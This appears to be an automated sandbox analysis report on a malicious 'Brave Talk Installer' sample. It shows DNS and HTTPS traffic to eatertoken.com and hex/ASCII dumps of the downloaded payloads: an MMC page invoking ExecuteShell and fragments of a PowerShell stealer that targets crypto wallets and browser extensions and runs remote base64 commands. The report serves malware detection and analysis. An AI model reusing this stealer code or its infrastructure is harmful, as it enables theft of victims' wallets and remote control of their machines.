KERNEL32.dll	LocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindNextFileA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipCloneImage, GdipFree, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipAlloc

Version Infos

Description	Data
FileDescription	Brave Talk Installer
InternalName	BraveTalk.exe
OriginalFilename	BraveTalk.exe
CompanyName	Brave Software Inc.
LegalCopyright	Brave Software Inc. All rights reserved.
ProductName	Brave Talk
FileVersion	7.0.1.3
ProductVersion	7.0.1.3
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-13T10:48:46.686431+0100	2053706	ET EXPLOIT [TW] EXPLOIT Possible MMC Remote Command Execution	2	104.21.84.99	443	192.168.2.11	49711	TCP
2025-03-13T10:50:51.631097+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.11	49722	104.21.84.99	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 13, 2025 10:48:44.379374981 CET	49711	443	192.168.2.11	104.21.84.99
Mar 13, 2025 10:48:44.379416943 CET	443	49711	104.21.84.99	192.168.2.11
Mar 13, 2025 10:48:44.379512072 CET	49711	443	192.168.2.11	104.21.84.99
Mar 13, 2025 10:48:44.392301083 CET	49711	443	192.168.2.11	104.21.84.99
Mar 13, 2025 10:48:44.392322063 CET	443	49711	104.21.84.99	192.168.2.11
Mar 13, 2025 10:48:45.942811012 CET	443	49711	104.21.84.99	192.168.2.11
Mar 13, 2025 10:48:45.942886114 CET	49711	443	192.168.2.11	104.21.84.99
Mar 13, 2025 10:48:46.056056023 CET	49711	443	192.168.2.11	104.21.84.99
Mar 13, 2025 10:48:46.056073904 CET	443	49711	104.21.84.99	192.168.2.11
Mar 13, 2025 10:48:46.056412935 CET	443	49711	104.21.84.99	192.168.2.11
Mar 13, 2025 10:48:46.056457043 CET	49711	443	192.168.2.11	104.21.84.99
Mar 13, 2025 10:48:46.060544014 CET	49711	443	192.168.2.11	104.21.84.99
Mar 13, 2025 10:48:46.104321003 CET	443	49711	104.21.84.99	192.168.2.11
Mar 13, 2025 10:48:46.686146021 CET	443	49711	104.21.84.99	192.168.2.11
Mar 13, 2025 10:48:46.686193943 CET	443	49711	104.21.84.99	192.168.2.11
Mar 13, 2025 10:48:46.686280966 CET	443	49711	104.21.84.99	192.168.2.11
Mar 13, 2025 10:48:46.686326027 CET	49711	443	192.168.2.11	104.21.84.99
Mar 13, 2025 10:48:46.686362982 CET	49711	443	192.168.2.11	104.21.84.99
Mar 13, 2025 10:48:46.687619925 CET	49711	443	192.168.2.11	104.21.84.99
Mar 13, 2025 10:48:46.687638998 CET	443	49711	104.21.84.99	192.168.2.11
Mar 13, 2025 10:50:49.260082006 CET	49722	443	192.168.2.11	104.21.84.99
Mar 13, 2025 10:50:49.260132074 CET	443	49722	104.21.84.99	192.168.2.11
Mar 13, 2025 10:50:49.260488033 CET	49722	443	192.168.2.11	104.21.84.99
Mar 13, 2025 10:50:49.268253088 CET	49722	443	192.168.2.11	104.21.84.99
Mar 13, 2025 10:50:49.268271923 CET	443	49722	104.21.84.99	192.168.2.11

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 13, 2025 10:48:44.351264000 CET	62206	53	192.168.2.11	1.1.1.1
Mar 13, 2025 10:48:44.367470026 CET	53	62206	1.1.1.1	192.168.2.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 13, 2025 10:48:44.351264000 CET	192.168.2.11	1.1.1.1	0x1bf0	Standard query (0)	eatertoken.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 13, 2025 10:48:44.367470026 CET	1.1.1.1	192.168.2.11	0x1bf0	No error (0)	eatertoken.com		104.21.84.99	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:48:44.367470026 CET	1.1.1.1	192.168.2.11	0x1bf0	No error (0)	eatertoken.com		172.67.191.12	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

eatertoken.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49711	104.21.84.99	443	7672	C:\Windows\System32\mmc.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 09:48:46 UTC	335	OUT	GET /f7sjdjf2w1/brave/ HTTP/1.1 Accept: / Accept-Language: en-CH UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: eatertoken.com Connection: Keep-Alive
2025-03-13 09:48:46 UTC	840	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 09:48:46 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Last-Modified: Sun, 09 Mar 2025 20:24:43 GMT Accept-Ranges: bytes cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tEKJ6SYggDSVU%2FqrWvQbLn62Pd09RtNHB6sk1d7680s4Q4dNCjeVsnqZIEjELJfsK2Zt27dxaPrs966ml16DaGl2fd4kdixXZY69bAMlUs2BRCchkMh2leYeCLCQI6v%2FJg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fa9e14ed01d31b-MCI alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4646&min_rtt=4062&rtt_var=2160&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=917&delivery_rate=437991&cwnd=251&unsent_bytes=0&cid=1a00ea98421b11b9&ts=733&x=0"
2025-03-13 09:48:46 UTC	529	IN	Data Raw: 61 38 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 6e 63 72 79 70 74 68 75 62 20 4c 4c 43 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 6d 6f 6e 6f 73 70 61 63 65 3b 0d 0a 20 20 Data Ascii: a8f<!DOCTYPE html><html lang="ru"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Encrypthub LLC</title> <style> body { font-family: monospace;
2025-03-13 09:48:46 UTC	1369	IN	Data Raw: 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 Data Ascii:
2025-03-13 09:48:46 UTC	812	IN	Data Raw: 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 90 e2 95 9d 20 0d 0a 20 20 20 20 3c 2f 70 72 65 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 65 78 74 65 72 6e 61 6c 2e 45 78 65 63 75 74 65 53 68 65 6c 6c Data Ascii: </pre></body><script> external.ExecuteShell
2025-03-13 09:48:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.11	49722	104.21.84.99	443

Timestamp	Bytes transferred	Direction	Data
2025-03-13 09:50:50 UTC	194	OUT	GET /f7sjdjf2w1/payload/builds/brave.ps1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: eatertoken.com Connection: Keep-Alive
2025-03-13 09:50:51 UTC	846	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 09:50:51 GMT Content-Length: 26470 Connection: close Last-Modified: Mon, 10 Mar 2025 00:52:03 GMT ETag: "6766-62ff2616a3aaa" Accept-Ranges: bytes cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N1miz9j7RBlxjTD61O0vBwi07teIGvzYcyq%2BEnVYwXsZ4LBL2PnD1otpsJ%2FwgcT7N%2BAyikCQKFRUsk5PrjkgTiDSNMKcK%2FQCwrr8Xjq3osXa3Hgd3KykT%2F7uFWaZZX8o5w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91faa1223a1fab71-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=21800&min_rtt=21478&rtt_var=8699&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=808&delivery_rate=120380&cwnd=245&unsent_bytes=0&cid=635f309ddb52d9fa&ts=793&x=0"
2025-03-13 09:50:51 UTC	1369	IN	Data Raw: 24 62 75 69 6c 64 20 3d 20 69 66 20 28 24 61 72 67 73 2e 43 6f 75 6e 74 20 2d 67 74 20 30 29 20 7b 20 24 61 72 67 73 5b 30 5d 20 7d 20 65 6c 73 65 20 7b 20 22 62 72 61 76 65 22 20 7d 0d 0a 24 73 65 72 76 65 72 20 3d 20 69 66 20 28 24 61 72 67 73 2e 43 6f 75 6e 74 20 2d 67 74 20 31 29 20 7b 20 24 61 72 67 73 5b 31 5d 20 7d 20 65 6c 73 65 20 7b 20 22 61 70 69 2e 65 61 74 65 72 74 6f 6b 65 6e 2e 63 6f 6d 22 20 7d 0d 0a 24 73 75 62 66 6f 6c 64 65 72 20 3d 20 69 66 20 28 24 61 72 67 73 2e 43 6f 75 6e 74 20 2d 67 74 20 32 29 20 7b 20 24 61 72 67 73 5b 32 5d 20 7d 20 65 6c 73 65 20 7b 20 22 66 37 73 6a 64 6a 66 32 77 31 22 20 7d 0d 0a 0d 0a 23 20 4d 55 54 45 58 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 24 41 70 70 49 64 20 3d 20 22 36 32 30 38 38 61 37 62 Data Ascii: $build = if ($args.Count -gt 0) { $args[0] } else { "brave" }$server = if ($args.Count -gt 1) { $args[1] } else { "api.eatertoken.com" }$subfolder = if ($args.Count -gt 2) { $args[2] } else { "f7sjdjf2w1" }# MUTEX--------------$AppId = "62088a7b
2025-03-13 09:50:51 UTC	1369	IN	Data Raw: 4d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 70 61 72 61 6d 20 28 0d 0a 20 20 20 20 20 20 20 20 5b 73 74 72 69 6e 67 5d 24 6d 65 73 73 61 67 65 0d 0a 20 20 20 20 29 0d 0a 20 20 20 20 69 66 20 28 24 64 65 62 75 67 4d 6f 64 65 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 74 69 6d 65 73 74 61 6d 70 20 3d 20 28 47 65 74 2d 44 61 74 65 29 2e 54 6f 53 74 72 69 6e 67 28 22 79 79 79 79 2d 4d 4d 2d 64 64 20 48 48 3a 6d 6d 3a 73 73 22 29 0d 0a 20 20 20 20 20 20 20 20 57 72 69 74 65 2d 48 6f 73 74 20 22 24 74 69 6d 65 73 74 61 6d 70 20 2d 20 24 6d 65 73 73 61 67 65 22 0d 0a 20 20 20 20 7d 0d 0a 7d 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 47 65 74 2d 43 6c 69 65 6e 74 49 6e 66 6f 20 7b 0d 0a 20 24 69 73 41 64 6d 69 6e 20 3d 20 24 66 61 6c 73 65 0d 0a 09 74 72 79 20 7b 0d Data Ascii: Message { param ( [string]$message ) if ($debugMode) { $timestamp = (Get-Date).ToString("yyyy-MM-dd HH:mm:ss") Write-Host "$timestamp - $message" }}function Get-ClientInfo { $isAdmin = $falsetry {
2025-03-13 09:50:51 UTC	1369	IN	Data Raw: 0d 0a 09 24 61 6e 74 69 76 69 72 75 73 4c 69 73 74 20 3d 20 28 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 4e 61 6d 65 73 70 61 63 65 20 22 72 6f 6f 74 5c 53 65 63 75 72 69 74 79 43 65 6e 74 65 72 32 22 20 2d 43 6c 61 73 73 20 22 41 6e 74 69 76 69 72 75 73 50 72 6f 64 75 63 74 22 29 2e 64 69 73 70 6c 61 79 4e 61 6d 65 20 2d 6a 6f 69 6e 20 22 2c 22 0d 0a 0d 0a 20 20 20 20 23 20 46 69 72 65 77 61 6c 6c 20 73 74 61 74 75 73 0d 0a 20 20 20 20 24 66 69 72 65 77 61 6c 6c 45 6e 61 62 6c 65 64 20 3d 20 28 47 65 74 2d 4e 65 74 46 69 72 65 77 61 6c 6c 50 72 6f 66 69 6c 65 20 2d 41 6c 6c 29 2e 45 6e 61 62 6c 65 64 20 2d 63 6f 6e 74 61 69 6e 73 20 24 74 72 75 65 0d 0a 0d 0a 20 20 20 20 72 65 74 75 72 6e 20 22 49 4e 46 4f 7c 24 28 24 65 6e 76 3a 43 4f 4d 50 55 54 45 Data Ascii: $antivirusList = (Get-WmiObject -Namespace "root\SecurityCenter2" -Class "AntivirusProduct").displayName -join "," # Firewall status $firewallEnabled = (Get-NetFirewallProfile -All).Enabled -contains $true return "INFO\|$($env:COMPUTE
2025-03-13 09:50:51 UTC	1369	IN	Data Raw: 61 74 68 20 24 65 6e 76 3a 6c 6f 63 61 6c 61 70 70 64 61 74 61 20 22 5c 43 6f 69 6e 6f 6d 69 5c 43 6f 69 6e 6f 6d 69 5c 77 61 6c 6c 65 74 73 22 0d 0a 09 09 09 22 44 61 73 68 22 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3d 20 4a 6f 69 6e 2d 50 61 74 68 20 24 65 6e 76 3a 61 70 70 64 61 74 61 20 20 20 20 20 20 22 5c 44 61 73 68 43 6f 72 65 5c 77 61 6c 6c 65 74 73 22 0d 0a 09 09 09 22 45 6c 65 63 74 72 75 6d 22 20 20 20 20 20 20 20 20 20 20 3d 20 4a 6f 69 6e 2d 50 61 74 68 20 24 65 6e 76 3a 61 70 70 64 61 74 61 20 20 20 20 20 20 22 5c 45 6c 65 63 74 72 75 6d 5c 77 61 6c 6c 65 74 73 22 0d 0a 09 09 09 22 45 74 68 65 72 65 75 6d 22 20 20 20 20 20 20 20 20 20 20 3d 20 4a 6f 69 6e 2d 50 61 74 68 20 24 65 6e 76 3a 61 70 70 64 61 74 61 20 20 20 20 20 20 22 5c 45 74 Data Ascii: ath $env:localappdata "\Coinomi\Coinomi\wallets""Dash" = Join-Path $env:appdata "\DashCore\wallets""Electrum" = Join-Path $env:appdata "\Electrum\wallets""Ethereum" = Join-Path $env:appdata "\Et
2025-03-13 09:50:51 UTC	1369	IN	Data Raw: 50 68 61 6e 74 6f 6d 5c 4c 6f 63 61 6c 20 53 74 6f 72 61 67 65 5c 6c 65 76 65 6c 64 62 22 0d 0a 09 09 09 22 53 6f 6c 6c 65 74 22 20 20 20 20 20 20 20 20 20 20 20 20 3d 20 4a 6f 69 6e 2d 50 61 74 68 20 24 65 6e 76 3a 61 70 70 64 61 74 61 20 20 20 20 20 20 22 5c 53 6f 6c 6c 65 74 5c 4c 6f 63 61 6c 20 53 74 6f 72 61 67 65 5c 6c 65 76 65 6c 64 62 22 0d 0a 09 09 09 22 4b 65 70 6c 72 22 20 20 20 20 20 20 20 20 20 20 20 20 20 3d 20 4a 6f 69 6e 2d 50 61 74 68 20 24 65 6e 76 3a 6c 6f 63 61 6c 61 70 70 64 61 74 61 20 22 5c 4b 65 70 6c 72 5c 4c 6f 63 61 6c 20 53 74 6f 72 61 67 65 5c 6c 65 76 65 6c 64 62 22 0d 0a 09 09 09 22 4e 69 66 74 79 20 57 61 6c 6c 65 74 22 20 20 20 20 20 20 3d 20 4a 6f 69 6e 2d 50 61 74 68 20 24 65 6e 76 3a 6c 6f 63 61 6c 61 70 70 64 61 74 61 Data Ascii: Phantom\Local Storage\leveldb""Sollet" = Join-Path $env:appdata "\Sollet\Local Storage\leveldb""Keplr" = Join-Path $env:localappdata "\Keplr\Local Storage\leveldb""Nifty Wallet" = Join-Path $env:localappdata
2025-03-13 09:50:51 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 3d 20 4a 6f 69 6e 2d 50 61 74 68 20 24 65 6e 76 3a 41 50 50 44 41 54 41 20 22 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 4f 70 65 72 61 20 53 74 61 62 6c 65 22 0d 0a 09 09 22 4f 70 65 72 61 47 58 22 20 20 20 20 20 20 3d 20 4a 6f 69 6e 2d 50 61 74 68 20 24 65 6e 76 3a 41 50 50 44 41 54 41 20 22 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 4f 70 65 72 61 20 47 58 20 53 74 61 62 6c 65 22 0d 0a 09 09 22 56 69 76 61 6c 64 69 22 20 20 20 20 20 20 3d 20 4a 6f 69 6e 2d 50 61 74 68 20 24 65 6e 76 3a 4c 4f 43 41 4c 41 50 50 44 41 54 41 20 22 56 69 76 61 6c 64 69 5c 55 73 65 72 20 44 61 74 61 22 0d 0a 09 09 22 59 61 6e 64 65 78 22 20 20 20 20 20 20 20 3d 20 4a 6f 69 6e 2d 50 61 74 68 20 24 65 6e 76 3a 4c 4f 43 41 4c 41 50 50 44 41 54 41 20 Data Ascii: = Join-Path $env:APPDATA "Opera Software\Opera Stable""OperaGX" = Join-Path $env:APPDATA "Opera Software\Opera GX Stable""Vivaldi" = Join-Path $env:LOCALAPPDATA "Vivaldi\User Data""Yandex" = Join-Path $env:LOCALAPPDATA
2025-03-13 09:50:51 UTC	1369	IN	Data Raw: 6a 68 6d 6b 68 68 6d 6b 62 6a 6b 6b 61 62 6e 64 63 6e 6e 6f 67 61 67 6f 67 62 6e 65 65 63 22 20 3d 20 22 52 6f 6e 69 6e 22 0d 0a 09 09 22 6c 67 6d 70 63 70 67 6c 70 6e 67 64 6f 61 6c 62 67 65 6f 6c 64 65 61 6a 66 63 6c 6e 68 61 66 61 22 20 3d 20 22 53 61 66 65 50 61 6c 22 0d 0a 09 09 22 6d 66 67 63 63 6a 63 68 69 68 66 6b 6b 69 6e 64 66 70 70 6e 61 6f 6f 65 63 67 66 6e 65 69 69 69 22 20 3d 20 22 54 6f 6b 65 6e 50 6f 63 6b 65 74 22 0d 0a 09 09 22 6e 70 68 70 6c 70 67 6f 61 6b 68 68 6a 63 68 6b 6b 68 6d 69 67 67 61 6b 69 6a 6e 6b 68 66 6e 64 22 20 3d 20 22 54 6f 6e 22 0d 0a 09 09 22 69 62 6e 65 6a 64 66 6a 6d 6d 6b 70 63 6e 6c 70 65 62 6b 6c 6d 6e 6b 6f 65 6f 69 68 6f 66 65 63 22 20 3d 20 22 54 72 6f 6e 4c 69 6e 6b 22 0d 0a 09 09 22 65 67 6a 69 64 6a 62 70 Data Ascii: jhmkhhmkbjkkabndcnnogagogbneec" = "Ronin""lgmpcpglpngdoalbgeoldeajfclnhafa" = "SafePal""mfgccjchihfkkindfppnaooecgfneiii" = "TokenPocket""nphplpgoakhhjchkkhmiggakijnkhfnd" = "Ton""ibnejdfjmmkpcnlpebklmnkoeoihofec" = "TronLink""egjidjbp
2025-03-13 09:50:51 UTC	1369	IN	Data Raw: 22 20 3d 20 22 4d 65 77 43 78 22 0d 0a 09 09 22 6e 61 6e 6a 6d 64 6b 6e 68 6b 69 6e 69 66 6e 6b 67 64 63 67 67 63 66 6e 68 64 61 61 6d 6d 6d 6a 22 20 3d 20 22 47 75 69 6c 64 57 61 6c 6c 65 74 22 0d 0a 09 09 22 6e 6b 64 64 67 6e 63 64 6a 67 6a 66 63 64 64 61 6d 66 67 63 6d 66 6e 6c 68 63 63 6e 69 6d 69 67 22 20 3d 20 22 53 61 74 75 72 6e 57 61 6c 6c 65 74 22 0d 0a 09 09 22 66 6e 6e 65 67 70 68 6c 6f 62 6a 64 70 6b 68 65 63 61 70 6b 69 6a 6a 64 6b 67 63 6a 68 6b 69 62 22 20 3d 20 22 48 61 72 6d 6f 6e 79 57 61 6c 6c 65 74 22 0d 0a 09 09 22 6d 67 66 66 6b 66 62 69 64 69 68 6a 70 6f 61 6f 6d 61 6a 6c 62 67 63 68 64 64 6c 69 63 67 70 6e 22 20 3d 20 22 50 61 6c 69 57 61 6c 6c 65 74 22 0d 0a 09 09 22 61 6f 64 6b 6b 61 67 6e 61 64 63 62 6f 62 66 70 67 67 66 6e 6a Data Ascii: " = "MewCx""nanjmdknhkinifnkgdcggcfnhdaammmj" = "GuildWallet""nkddgncdjgjfcddamfgcmfnlhccnimig" = "SaturnWallet""fnnegphlobjdpkhecapkijjdkgcjhkib" = "HarmonyWallet""mgffkfbidihjpoaomajlbgchddlicgpn" = "PaliWallet""aodkkagnadcbobfpggfnj
2025-03-13 09:50:51 UTC	1369	IN	Data Raw: 73 69 6f 6e 50 61 74 68 20 74 6f 20 24 77 61 6c 6c 65 74 44 69 72 50 61 74 68 22 20 2d 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 20 47 72 65 65 6e 0d 0a 09 09 09 09 09 09 09 7d 0d 0a 09 09 09 09 09 09 09 63 61 74 63 68 20 7b 0d 0a 09 09 09 09 09 09 09 09 57 72 69 74 65 2d 48 6f 73 74 20 22 5b 21 5d 20 46 61 69 6c 65 64 20 74 6f 20 63 68 65 63 6b 20 24 77 61 6c 6c 65 74 4e 61 6d 65 20 77 61 6c 6c 65 74 20 66 72 6f 6d 20 24 65 78 74 65 6e 73 69 6f 6e 50 61 74 68 22 20 2d 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 20 52 65 64 0d 0a 09 09 09 09 09 09 09 7d 0d 0a 09 09 09 09 09 09 7d 0d 0a 09 09 09 09 09 7d 0d 0a 09 09 09 09 7d 0d 0a 09 09 09 7d 0d 0a 09 09 7d 0d 0a 09 7d 0d 0a 09 72 65 74 75 72 6e 20 24 68 61 73 77 61 6c 6c 65 74 73 0d 0a 7d 0d 0a 0d 0a Data Ascii: sionPath to $walletDirPath" -ForegroundColor Green}catch {Write-Host "[!] Failed to check $walletName wallet from $extensionPath" -ForegroundColor Red}}}}}}}return $haswallets}
2025-03-13 09:50:51 UTC	1369	IN	Data Raw: 20 20 77 68 69 6c 65 20 28 24 73 74 72 65 61 6d 20 2d 65 71 20 24 6e 75 6c 6c 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 53 74 61 72 74 2d 53 6c 65 65 70 20 2d 53 65 63 6f 6e 64 73 20 35 0d 0a 20 20 20 20 20 20 20 20 24 73 74 72 65 61 6d 20 3d 20 45 73 74 61 62 6c 69 73 68 2d 43 6f 6e 6e 65 63 74 69 6f 6e 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 72 65 74 75 72 6e 20 24 73 74 72 65 61 6d 0d 0a 7d 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 45 78 65 63 75 74 65 2d 43 6f 6d 6d 61 6e 64 20 7b 0d 0a 20 20 20 20 70 61 72 61 6d 20 28 0d 0a 20 20 20 20 20 20 20 20 5b 73 74 72 69 6e 67 5d 24 63 6f 6d 6d 61 6e 64 42 61 73 65 36 34 0d 0a 20 20 20 20 29 0d 0a 20 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 63 6f 6d 6d 61 6e 64 20 3d 20 5b 53 79 73 74 65 6d 2e 54 65 Data Ascii: while ($stream -eq $null) { Start-Sleep -Seconds 5 $stream = Establish-Connection } return $stream}function Execute-Command { param ( [string]$commandBase64 ) try { $command = [System.Te

Target ID:	0
Start time:	05:48:41
Start date:	13/03/2025
Path:	C:\Users\user\Desktop\IPt9U27NoX.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\IPt9U27NoX.exe"
Imagebase:	0x7ff71f620000
File size:	565'744 bytes
MD5 hash:	7E287E5F835EF3B491383DD8626EEAD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	05:48:42
